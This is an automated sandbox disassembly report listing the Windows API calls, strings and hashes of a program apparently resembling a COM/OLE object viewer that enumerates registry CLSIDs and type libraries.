                                                                                                      • Part of subcall function 00677980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0067798C
                                                                                                      • Part of subcall function 006778ED: GetFocus.USER32 ref: 006778ED
                                                                                                      • Part of subcall function 006778ED: #2859.MFC42U(00000000), ref: 006778F4
                                                                                                      • Part of subcall function 006778FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 0067790C
                                                                                                    • CLSIDFromString.OLE32(00000000,?,00000100), ref: 0067312B
                                                                                                    • wcstok.MSVCRT ref: 00673191
                                                                                                    • wcstol.MSVCRT ref: 0067319A
                                                                                                    • wcstok.MSVCRT ref: 006731BA
                                                                                                    • wcstol.MSVCRT ref: 006731C3
                                                                                                    • #1662.MFC42U(Version,006621A0,?,00000100,00000100), ref: 006731DE
                                                                                                    • GetUserDefaultLCID.KERNEL32(Version,006621A0,?,00000100,00000100), ref: 006731E3
                                                                                                    • LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0067320F
                                                                                                    • GetSystemDefaultLCID.KERNEL32 ref: 00673227
                                                                                                    • LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0067326D
                                                                                                    • RegOpenKeyW.ADVAPI32(80000000,TypeLib,?), ref: 0067329A
                                                                                                    • StringFromGUID2.OLE32(?,?,00000027), ref: 006732B5
                                                                                                    • RegOpenKeyW.ADVAPI32(?,?,?), ref: 006732CC
                                                                                                    • RegOpenKeyW.ADVAPI32(?,?,?), ref: 006732EA
                                                                                                    • LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00673330
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00673342
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0067334E
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0067335A
                                                                                                    • wsprintfW.USER32 ref: 00673395
                                                                                                    • #2644.MFC42U ref: 006733A4
                                                                                                    • #538.MFC42U(?), ref: 006733B6
                                                                                                    • #800.MFC42U(?,00000000,?), ref: 006733DB
                                                                                                    • #2644.MFC42U ref: 006733E8
                                                                                                      • Part of subcall function 00671C95: __EH_prolog3_GS.LIBCMT ref: 00671C9F
                                                                                                      • Part of subcall function 00671C95: StringFromGUID2.OLE32(?,?,00000028,000002BC,00674FBE,00000000,00669ECC,?), ref: 00671CCE
                                                                                                      • Part of subcall function 00671C95: wsprintfW.USER32 ref: 00671CE4
                                                                                                      • Part of subcall function 00671C95: RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00671D1A
                                                                                                      • Part of subcall function 00671C95: lstrcpyW.KERNEL32(?,<no name>), ref: 00671D30
                                                                                                      • Part of subcall function 00671C95: RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00671D9E
                                                                                                      • Part of subcall function 00671C95: RegQueryValueW.ADVAPI32(80000002,?,?,000000A0), ref: 00671DEE
                                                                                                      • Part of subcall function 00671C95: CLSIDFromString.OLE32(?,?), ref: 00671E06
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FromString$CloseLoadOpenQueryTypeValue$#2644DefaultMessageSendwcstokwcstolwsprintf$#1662#2859#538#800FocusH_prolog3_SystemUserlstrcpy
                                                                                                    • String ID: LoadRegTypeLib(%u, %u, %lu, &u ...) failed.$TypeLib$Version
                                                                                                    • API String ID: 672647845-2616143947
                                                                                                    • Opcode ID: fe1cb85fb6087f425abee847b98f8acad867214aa5975ba9120b185e8487fbe3
                                                                                                    • Instruction ID: 7f088f5880274d807ec4fa279882b72f0e1c13e63c0026bb2eeed0daf8134c3b
                                                                                                    • Opcode Fuzzy Hash: fe1cb85fb6087f425abee847b98f8acad867214aa5975ba9120b185e8487fbe3
                                                                                                    • Instruction Fuzzy Hash: 97C10771904228EFDF609F60CC49BA9B7BBBF84314F0186E9E50DA7250DB725EA49F14
                                                                                                    APIs
                                                                                                      • Part of subcall function 0067D4CD: GetVersionExW.KERNEL32(?), ref: 0067D4F3
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066E1E5
                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E1F9
                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E219
                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E242
                                                                                                    • #6211.MFC42U(00000005,?,?,?), ref: 0066E259
                                                                                                    • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0066E268
                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E277
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066E28E
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066E2A6
                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E2BD
                                                                                                    • SendMessageW.USER32(?,0000133E,00000000,00000001), ref: 0066E2DE
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066E30F
                                                                                                    • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 0066E326
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066E345
                                                                                                    • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 0066E35C
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066E372
                                                                                                    • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 0066E389
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066E3A6
                                                                                                    • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 0066E3BD
                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0066E3D0
                                                                                                    • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 0066E3EB
                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?), ref: 0066E3FE
                                                                                                      • Part of subcall function 0066E466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E482
                                                                                                      • Part of subcall function 0066E466: #6211.MFC42U(00000005,?,?,?,?,?,0066E130,?,?), ref: 0066E49B
                                                                                                      • Part of subcall function 0066E466: SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0066E4AA
                                                                                                      • Part of subcall function 0066E466: SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066E4BE
                                                                                                      • Part of subcall function 0066E466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E4ED
                                                                                                      • Part of subcall function 0066E466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E504
                                                                                                      • Part of subcall function 0066E466: SendMessageW.USER32(?,0000133E,00000000,?), ref: 0066E528
                                                                                                      • Part of subcall function 0066E466: SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0066E53B
                                                                                                      • Part of subcall function 0066E466: SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 0066E555
                                                                                                      • Part of subcall function 0066E466: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,0066E130,?,?), ref: 0066E569
                                                                                                      • Part of subcall function 0066E466: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,0066E130,?,?), ref: 0066E578
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$RedrawWindow$#6211$Version
                                                                                                    • String ID: Access Permissions$Activation$Implementation$Launch Permissions
                                                                                                    • API String ID: 3082685337-186467299
                                                                                                    • Opcode ID: 55c531a027bb39f613fd357c35f0fd064735cdca9d9415f11c251e896b5ad842
                                                                                                    • Instruction ID: 65047742c0f462f55f5e5f9d00f3a6c261f521026a743805226d592fadd69077
                                                                                                    • Opcode Fuzzy Hash: 55c531a027bb39f613fd357c35f0fd064735cdca9d9415f11c251e896b5ad842
                                                                                                    • Instruction Fuzzy Hash: FF515A74504646BEFB212B31DC5CEABBABFFB82B01F01151CF56AA11A0DB766941CB60
                                                                                                    APIs
                                                                                                    • #1662.MFC42U(800E373A), ref: 00674CA5
                                                                                                    • GetUserDefaultLCID.KERNEL32(800E373A), ref: 00674CAA
                                                                                                    • LoadRegTypeLib.OLEAUT32(-00000008,?,?,?,?), ref: 00674CDA
                                                                                                    • GetSystemDefaultLCID.KERNEL32 ref: 00674CF2
                                                                                                    • LoadRegTypeLib.OLEAUT32(-00000008,?,?,?,?), ref: 00674D3C
                                                                                                    • RegOpenKeyW.ADVAPI32(80000000,TypeLib,?), ref: 00674D69
                                                                                                    • StringFromGUID2.OLE32(-00000008,?,00000027), ref: 00674D84
                                                                                                    • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00674D9B
                                                                                                    • memset.MSVCRT ref: 00674DB7
                                                                                                    • wnsprintfW.SHLWAPI ref: 00674DE0
                                                                                                    • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00674DFD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open$DefaultLoadType$#1662FromStringSystemUsermemsetwnsprintf
                                                                                                    • String ID: %u.%u$LoadRegTypeLib(%s, %u, %u, %lu, ...) failed.$TypeLib
                                                                                                    • API String ID: 2064963674-2378697407
                                                                                                    • Opcode ID: b073435c01d959bb0b09ec26ac7a2c13369f585bd10b4fa5c4f68427caa0b9e7
                                                                                                    • Instruction ID: 72989224a440217680c26695878f4ae5fa30ce836ee86842af87daf4afd00d02
                                                                                                    • Opcode Fuzzy Hash: b073435c01d959bb0b09ec26ac7a2c13369f585bd10b4fa5c4f68427caa0b9e7
                                                                                                    • Instruction Fuzzy Hash: 38C11BB1900218AFDB60DF64CC89BA977BABF44315F0081A9FA0DE7251DB359E84DF19
                                                                                                    APIs
                                                                                                      • Part of subcall function 00679137: CoFreeUnusedLibraries.OLE32(00674689,00000000,?), ref: 006791A2
                                                                                                    • #540.MFC42U(800E373A,?,?,?,?,00680AE8,000000FF,?,00672E44,?,?,00000104), ref: 00675050
                                                                                                    • CoGetClassObject.OLE32(000000FC,800E373A,00000000,00669E3C,00000000,800E373A,?,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 0067507D
                                                                                                    • CoGetClassObject.OLE32(000000FC,800E373A,00000000,00669E3C,00000000,800E373A,?,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 0067509D
                                                                                                    • #860.MFC42U(CoGetClassObject failed.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 006750B4
                                                                                                    • #1262.MFC42U(00000000,CoGetClassObject failed.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 006750BC
                                                                                                    • #860.MFC42U(CoGetClassObject succeeded, but punk was NULL.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 006750CF
                                                                                                    • #1262.MFC42U(00000000,CoGetClassObject succeeded, but punk was NULL.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 006750D7
                                                                                                    • #860.MFC42U(QueryInterface on class factory for IClassFactory failed.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 00675118
                                                                                                    • #1262.MFC42U(00000000,QueryInterface on class factory for IClassFactory failed.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 00675120
                                                                                                    • #860.MFC42U(CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 00675136
                                                                                                    • #1262.MFC42U(00000000,CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 0067513E
                                                                                                    • #860.MFC42U(IClassFactory::CreateInstance failed.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 006751A6
                                                                                                    • #1262.MFC42U(00000000,IClassFactory::CreateInstance failed.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 006751AE
                                                                                                    • #860.MFC42U(IClassFactory::CreateInstance succeeded, but punk was NULL.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 006751C4
                                                                                                    • #1262.MFC42U(00000000,IClassFactory::CreateInstance succeeded, but punk was NULL.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 006751CC
                                                                                                    • #800.MFC42U(?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 00675256
                                                                                                    Strings
                                                                                                    • CoGetClassObject failed., xrefs: 006750AC
                                                                                                    • D.g, xrefs: 006750F5
                                                                                                    • IClassFactory::CreateInstance failed., xrefs: 0067519E
                                                                                                    • CoGetClassObject succeeded, but pClassFactory was NULL., xrefs: 0067512E
                                                                                                    • CoGetClassObject succeeded, but punk was NULL., xrefs: 006750C7
                                                                                                    • IClassFactory::CreateInstance succeeded, but punk was NULL., xrefs: 006751BC
                                                                                                    • QueryInterface on class factory for IClassFactory failed., xrefs: 00675110
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #1262#860$ClassObject$#540#800FreeLibrariesUnused
                                                                                                    • String ID: CoGetClassObject failed.$CoGetClassObject succeeded, but pClassFactory was NULL.$CoGetClassObject succeeded, but punk was NULL.$D.g$IClassFactory::CreateInstance failed.$IClassFactory::CreateInstance succeeded, but punk was NULL.$QueryInterface on class factory for IClassFactory failed.
                                                                                                    • API String ID: 3706085179-1271380236
                                                                                                    • Opcode ID: 14d19a2110ffe4d7801916b59be8ad7f5c4b7bbed0159a691700a7e9c085587c
                                                                                                    • Instruction ID: 6b4a0ada4c05367569d70a2ac05a1f1bb57820a84d2efa73c11947297bf96f7f
                                                                                                    • Opcode Fuzzy Hash: 14d19a2110ffe4d7801916b59be8ad7f5c4b7bbed0159a691700a7e9c085587c
                                                                                                    • Instruction Fuzzy Hash: 0871E575E10209EFCF10DFA4C88ABAEBBB6FF08311F108159E516B72A1D7759A44CB60
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00671C9F
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,000002BC,00674FBE,00000000,00669ECC,?), ref: 00671CCE
                                                                                                    • wsprintfW.USER32 ref: 00671CE4
                                                                                                    • RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00671D1A
                                                                                                    • lstrcpyW.KERNEL32(?,<no name>), ref: 00671D30
                                                                                                    • RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00671D9E
                                                                                                    • RegQueryValueW.ADVAPI32(80000002,?,?,000000A0), ref: 00671DEE
                                                                                                    • CLSIDFromString.OLE32(?,?), ref: 00671E06
                                                                                                    • #540.MFC42U ref: 00671E18
                                                                                                    • #2810.MFC42U(?,Could not convert the CLSID of the %s interface viewer.,?), ref: 00671E33
                                                                                                    • #800.MFC42U(?,00000000), ref: 00671E4E
                                                                                                    • #540.MFC42U ref: 00671E90
                                                                                                    • #2859.MFC42U(?,00000001), ref: 00671EB6
                                                                                                    • #800.MFC42U(00000000,?,00000001), ref: 00671ED3
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,00661990,?), ref: 00671EEE
                                                                                                    • #2810.MFC42U(?,The %s interface viewer failed to load.,?), ref: 00671F91
                                                                                                    Strings
                                                                                                    • Interface\%s\OLEViewerIViewerCLSID, xrefs: 00671D57
                                                                                                    • Software\Microsoft\IViewers\Interface\%s\OLEViewerIViewerCLSID, xrefs: 00671DAC
                                                                                                    • Could not convert the CLSID of the %s interface viewer., xrefs: 00671E2D
                                                                                                    • <no name>, xrefs: 00671D24
                                                                                                    • Interface\%s, xrefs: 00671CDE
                                                                                                    • The %s interface viewer failed to load., xrefs: 00671F8B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$#2810#540#800FromString$#2859CreateH_prolog3_Instancelstrcpywsprintf
                                                                                                    • String ID: <no name>$Could not convert the CLSID of the %s interface viewer.$Interface\%s$Interface\%s\OLEViewerIViewerCLSID$Software\Microsoft\IViewers\Interface\%s\OLEViewerIViewerCLSID$The %s interface viewer failed to load.
                                                                                                    • API String ID: 3373394939-4261977633
                                                                                                    • Opcode ID: 1692ee5919054dde903673b3cf0a70827f48c109db2b175565dfa9e2bc22fef4
                                                                                                    • Instruction ID: 5c78b4a3ab9daf13a6f05328445af8d30d8be03ede71829036b730811a416063
                                                                                                    • Opcode Fuzzy Hash: 1692ee5919054dde903673b3cf0a70827f48c109db2b175565dfa9e2bc22fef4
                                                                                                    • Instruction Fuzzy Hash: 6A81FA71900229ABDB61DF54CC89AEEB7BEBF09300F5545AAE90DE7250DB309E84CF50
                                                                                                    APIs
                                                                                                    • #4704.MFC42U ref: 0066D024
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0066D030
                                                                                                    • SetCursor.USER32(00000000), ref: 0066D037
                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 0066D06F
                                                                                                    • SendMessageW.USER32(?,00001061,00000001,?), ref: 0066D0A0
                                                                                                    • RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 0066D0B3
                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000100), ref: 0066D0D0
                                                                                                    • wsprintfW.USER32 ref: 0066D0F8
                                                                                                    • lstrcpyW.KERNEL32(?,00662948,80000000,?,006621A0,?,000001FE), ref: 0066D13F
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0066D18E
                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 0066D1BE
                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,00000001), ref: 0066D1F3
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0066D205
                                                                                                    • SetCursor.USER32(00000000), ref: 0066D20C
                                                                                                    • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 0066D23B
                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,00000009), ref: 0066D263
                                                                                                    • #5977.MFC42U ref: 0066D26F
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0066D27A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Cursor$Load$#4704#5977CloseEnumOpenlstrcpywsprintf
                                                                                                    • String ID: CLSID$CLSID\%s$Class Name
                                                                                                    • API String ID: 3330777091-3884686139
                                                                                                    • Opcode ID: dc5e53f2da852bb72e1b730a664631938421868a1c53d428dfe54219512a4a4a
                                                                                                    • Instruction ID: 16844960a3a1a50ac44948688c7c80fa5cd17498d63e1d37fca430b765983357
                                                                                                    • Opcode Fuzzy Hash: dc5e53f2da852bb72e1b730a664631938421868a1c53d428dfe54219512a4a4a
                                                                                                    • Instruction Fuzzy Hash: AB6131B1900219AFEB209F60DC89FDAB7BAFB84304F1045E9E61DA6191DB725E94CF10
                                                                                                    APIs
                                                                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,?,?,0067CB28,00000000,00000000,?), ref: 0067CB71
                                                                                                    • GetLastError.KERNEL32(?,?,?,0067CB28,00000000,00000000,?,?,?,0067CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CB77
                                                                                                    • malloc.MSVCRT ref: 0067CB9D
                                                                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,0067CB28,00000000,00000000,?,?,?,0067CE14,00000000,00000000), ref: 0067CBC1
                                                                                                    • GetLastError.KERNEL32(?,?,0067CB28,00000000,00000000,?,?,?,0067CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CBCB
                                                                                                    • free.MSVCRT ref: 0067CD14
                                                                                                    • free.MSVCRT ref: 0067CD20
                                                                                                    • free.MSVCRT ref: 0067CD31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$ErrorInformationLastToken$malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3900411180-0
                                                                                                    • Opcode ID: 0ac312d6455950ba682ed90b24d48f748144810b8103843ae975593a8ab40985
                                                                                                    • Instruction ID: b5b9fa56eb3a2531e2a516e6a69a3cc8329bb335fd41642d5687efb9bb096215
                                                                                                    • Opcode Fuzzy Hash: 0ac312d6455950ba682ed90b24d48f748144810b8103843ae975593a8ab40985
                                                                                                    • Instruction Fuzzy Hash: B951A776900117FFDB219FA4DC48AAA7A76FF45761B22922DFD09E7210DB318D409B90
                                                                                                    APIs
                                                                                                    • #540.MFC42U(?,?), ref: 00676CF1
                                                                                                    • #2810.MFC42U(?,IMoniker::BindToObject failed on the file moniker created from ( "%s" ).,00000000,?,?), ref: 00676D15
                                                                                                    • #800.MFC42U(?,00000000), ref: 00676D39
                                                                                                      • Part of subcall function 00675010: #540.MFC42U(800E373A,?,?,?,?,00680AE8,000000FF,?,00672E44,?,?,00000104), ref: 00675050
                                                                                                      • Part of subcall function 00675010: CoGetClassObject.OLE32(000000FC,800E373A,00000000,00669E3C,00000000,800E373A,?,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 0067507D
                                                                                                      • Part of subcall function 00675010: #860.MFC42U(CoGetClassObject failed.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 006750B4
                                                                                                      • Part of subcall function 00675010: #1262.MFC42U(00000000,CoGetClassObject failed.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 006750BC
                                                                                                      • Part of subcall function 00675010: #860.MFC42U(CoGetClassObject succeeded, but punk was NULL.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 006750CF
                                                                                                      • Part of subcall function 00675010: #1262.MFC42U(00000000,CoGetClassObject succeeded, but punk was NULL.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 006750D7
                                                                                                      • Part of subcall function 00675010: #860.MFC42U(QueryInterface on class factory for IClassFactory failed.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 00675118
                                                                                                      • Part of subcall function 00675010: #1262.MFC42U(00000000,QueryInterface on class factory for IClassFactory failed.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 00675120
                                                                                                      • Part of subcall function 00675010: #860.MFC42U(CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 00675136
                                                                                                      • Part of subcall function 00675010: #1262.MFC42U(00000000,CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00680AE8,000000FF,?,00672E44,?), ref: 0067513E
                                                                                                    • RegOpenKeyW.ADVAPI32(80000000,Interface,?), ref: 00676E1F
                                                                                                    • malloc.MSVCRT ref: 00676E77
                                                                                                    • malloc.MSVCRT ref: 00676EBA
                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000050), ref: 00676F38
                                                                                                    • CLSIDFromString.OLE32(00000000,00000000), ref: 00676F76
                                                                                                    • StringFromGUID2.OLE32(00000000,?,00000100), ref: 00677148
                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0067717B
                                                                                                    • RegQueryValueW.ADVAPI32(?,?,?,00000200), ref: 006771A6
                                                                                                    • wsprintfW.USER32 ref: 006771D9
                                                                                                    • free.MSVCRT ref: 0067733B
                                                                                                    • free.MSVCRT ref: 0067734A
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00677389
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #1262#860$#540FromStringfreemalloc$#2810#800ClassCloseEnumObjectOpenQueryValuelstrcpywsprintf
                                                                                                    • String ID: %s <no name>$'$IMoniker::BindToObject failed on the file moniker created from ( "%s" ).$Interface$l;g
                                                                                                    • API String ID: 3715769521-2136238675
                                                                                                    • Opcode ID: 66659e589fc11e05ee286800f5bc70e9d9ed9be146222fe5f7508b4633c7fa61
                                                                                                    • Instruction ID: 1636035ece28c8d6efae44d46958343c76e8cd6d0218d4a68d11b3f943359916
                                                                                                    • Opcode Fuzzy Hash: 66659e589fc11e05ee286800f5bc70e9d9ed9be146222fe5f7508b4633c7fa61
                                                                                                    • Instruction Fuzzy Hash: C322D6B0905229DFDBA4DF14CD84BA9B7BABB44305F1040D9E60EA7292DB749EC5CF18
                                                                                                    APIs
                                                                                                    • #4493.MFC42U ref: 00670E90
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00671B2B
                                                                                                    • #540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00671B35
                                                                                                    • #540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00671B41
                                                                                                    • #4155.MFC42U(00000004,00000044,00000000,?,?), ref: 00671B4F
                                                                                                    • #4155.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00671B59
                                                                                                    • #540.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00671B61
                                                                                                    • #3865.MFC42U(?,00000005,00000004,00000044,00000000,?,?), ref: 00671B77
                                                                                                    • #2970.MFC42U(00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00671B8C
